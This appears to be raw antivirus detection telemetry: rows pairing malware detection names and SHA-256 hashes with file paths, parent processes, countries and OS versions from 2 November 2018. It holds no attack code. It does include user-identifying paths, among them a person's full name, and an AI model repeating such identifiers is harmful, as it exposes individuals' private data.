  Row(detection=Row(filename='tmp00010657', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010657', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:33:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered donad', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered donad', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='25d15dfae56e82fc98d308f15accee6c3d6dbc5e04c9a7dab5fa50c57e75ded5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:40:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='-&jf+novcs.exe', filepath='C:\\Program Files\\Simple XML Editor\\F3E6P0L3TQDUWIQJ3YLRGF5TGFY\\-&jf+NOVcs.exe', filesize=640000, name='TR/Dropper.Gen.#M300.#R4046'), hash='66fbd02d6b8a876cfa17da6c1444ffa817175a6ab70f5690b1e9fd07d9ba6b2d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:RO1BHR\\\\\\/Dyk2xCNjE.1', country='SC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:51:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0daa06240e33f2a887308725eb0e802e8524f8f970270dfc7c6f2a981fe638a6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0DAA06240E33F2A887308725EB0E802E8524F8F970270DFC7C6F2A981FE638A6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0daa06240e33f2a887308725eb0e802e8524f8f970270dfc7c6f2a981fe638a6', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:11:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T16:53:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:36:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='keygen.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXb0.350\\Keygen\\Keygen.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='SA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=49664, timestamp='2018-11-02T20:12:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T12:09:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:21:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:29:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155903-e70f30cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155903-E70F30CF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T20:25:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:10:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0a78cbb83f36f008d550e3fe037743fb216180ccc39ee2bcbb137df15c51b34b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0A78CBB83F36F008D550E3FE037743FB216180CCC39EE2BCBB137DF15C51B34B', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='0a78cbb83f36f008d550e3fe037743fb216180ccc39ee2bcbb137df15c51b34b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:50:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='far cry primal v1.3.3 plus +15 trainer.exe', filepath='F:\\Far Cry Primal v1.3.3 Plus +15 Trainer (ใช้ได้)\\Far Cry Primal v1.3.3 Plus +15 Trainer.exe', filesize=4856000, name='HEUR/AGEN.1033989.#M1.#R1'), hash='05da284eecf14e3b72ff9f84102b0370fd71cb0d93dbf3aea2d78801b4863c1d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\FutureXGame\\Far Cry Primal Trainer.exe', parentsize=3166208, timestamp='2018-11-02T14:52:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\Downloads\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\msoxh (3).exe', parentsize=948427824, timestamp='2018-11-02T13:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:03:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3e8bb698992fa07dc70b0c98cffe764622cc1cbe2f8191fa18e8bbca9d66456b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='restaurant - la.exe', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Templates\\Restaurant - LA\\Restaurant - LA.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ff58fbe59a5a4d1457dcabed63f554044ce12fa439a3d7e72070800b978ec21', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0FF58FBE59A5A4D1457DCABED63F554044CE12FA439A3D7E72070800B978EC21', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='0ff58fbe59a5a4d1457dcabed63f554044ce12fa439a3d7e72070800b978ec21', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:32:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054550-86496217', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054550-86496217', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052255-528a037a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052255-528A037A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-011133-72c13482', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb24b2b1\\AVSCAN-20181102-011113-6FF7C730\\AVSCAN-20181102-011133-72C13482', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:11:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053106-779b63cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053106-779B63CF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055638-08a865dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055638-08A865DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T18:24:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051551-5649c2c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051551-5649C2C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050710-1fd2eb14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050710-1FD2EB14', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061213-35c18af1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061213-35C18AF1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lusetup.exe', filepath='D:\\KOUSHIK\\SOFTWARES\\symantec\\symantec enpoint protection 11.0\\SEP\\LUSETUP.EXE', filesize=3636000, name='W32/Sality.AT.#M0.#R0'), hash='5af254be2d27f4d8d7242313524b51c89da73feb26b3706ad13dff3548fcaddb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055222-7009ade7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055222-7009ADE7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trunks ssj2.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Trunks SSJ2\\Trunks SSJ2.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='4a7a44f7a88fdbe09717b5583e6015a1b6f8ca0067d4762a2c5467d391eb44f5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T09:04:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133328-8a8f7a09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133328-8A8F7A09', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:36:35Z'), dt=datetime.date(2018, 11, 2)),
